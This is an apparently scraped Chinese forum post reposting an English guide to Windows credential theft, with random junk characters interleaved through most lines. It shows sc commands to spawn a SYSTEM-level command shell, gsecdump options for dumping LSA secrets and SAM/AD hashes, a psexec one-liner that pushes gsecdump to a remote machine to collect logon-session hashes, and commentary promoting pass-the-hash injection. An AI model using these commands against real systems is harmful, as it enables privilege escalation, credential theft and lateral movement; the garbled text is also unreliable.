o get a DOS Prompt as NT system:
2 l5 ?' G8 Z l' E/ m( w* h: V7 }% Y5 C% y* _1 z2 A
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact" Q0 b [3 _" T3 l4 z
[SC] CreateService SUCCESS
6 C& l5 m0 M6 h5 q' s9 E8 P* u7 Q) U, b: a/ o
C:\>sc start shellcmdline
3 Z5 G1 s* O3 t" {# N& n[SC] StartService FAILED 1053:" t" O9 P! u5 I% X% z% O
! g! J' X" \9 {1 L9 @6 }2 ]3 y
The service did not respond to the start or control request in a timely fashion.' l, g; L' y# ^% R
. {8 n) i; L) Y8 W8 A1 Z; d4 nC:\>sc delete shellcmdline( N: S* D9 `& \/ O
[SC] DeleteService SUCCESS6 A' n& H# F& Q/ H+ R/ y3 _
' Y9 `2 C) A# V------------
2 R* z3 Y2 _2 I% G# N' n0 x. f% }0 o8 {( R7 r" Q
Then in the new DOS window:
+ q6 e* ]- @0 A& W. H" @! {; E- h* F* v6 x. [8 ^# d
Microsoft Windows XP [Version 5.1.2600]& R. r, U# ] z/ A# V, b$ N
(C) Copyright 1985-2001 Microsoft Corp.
+ B9 W0 W; |1 R; \) M% [5 u+ `; B0 h6 R0 G& }5 z( {
C:\WINDOWS\system32>whoami. X" y: b8 j! Y t5 n
NT AUTHORITY\SYSTEM
+ j* v, o# X0 y. {4 U+ l$ g/ v/ G; @' u" v/ W6 R
C:\WINDOWS\system32>gsecdump -h
8 C. V! T3 `6 O3 rgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
: B' N! \. |6 z { s eusage: gsecdump [options]
9 e: f) `# S; @# n) A. G) [
1 k# ~5 Z) H, `; V5 K9 Foptions:
, m% G L5 Y6 h) f6 I-h [ --help ] show help
7 m0 f" o# \4 O-a [ --dump_all ] dump all secrets
4 W3 U$ `1 \7 ]0 S/ j3 g-l [ --dump_lsa ] dump lsa secrets, k; c9 v, y$ o. e4 y4 [2 _
-w [ --dump_wireless ] dump microsoft wireless connections( ~: P- k& w2 i6 J* P
-u [ --dump_usedhashes ] dump hashes from active logon sessions( W2 c0 e' D& m
-s [ --dump_hashes ] dump hashes from SAM/AD5 `! q+ k/ l; G. U e
2 ?+ `* R0 M: C T9 x+ E) @
Although I like to use:8 B8 u. t- }; f6 |3 J( g( [
" ^' Z+ i/ Z; s8 z8 s) |# E; y6 B
PsExec v1.83 - Execute processes remotely2 S# }& D1 D! i5 U2 o# ?
Copyright (C) 2001-2007 Mark Russinovich
8 s" i2 L* Z0 v% O# tSysinternals - 链接标记[url]www.sysinternals.com[/url]
, b9 _* G8 Q2 I5 ^+ h J
: Z; h. f; q$ PC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
' M, g3 ?2 B7 R
! Q& E8 q5 X8 W. Cto get the hashes from active logon sessions of a remote system.
) J+ R, e, C% g/ u% V0 D7 K% @8 x. l' b" O* e6 y& ]- P* W1 i4 ^
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
e% `4 a6 r- x( Z6 s- v
" c9 y# w' L* ^ I提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.2 q5 Y; ^* I8 ~4 v
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]% j- ~$ b2 ?( B' J s: h
1 s0 }- Z0 N6 ~/ p1 e9 a8 a: P
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。! c6 i+ b) h/ x" [. i# E& W
|
发表于 2012-11-6 21:09:29
收藏
支持
反对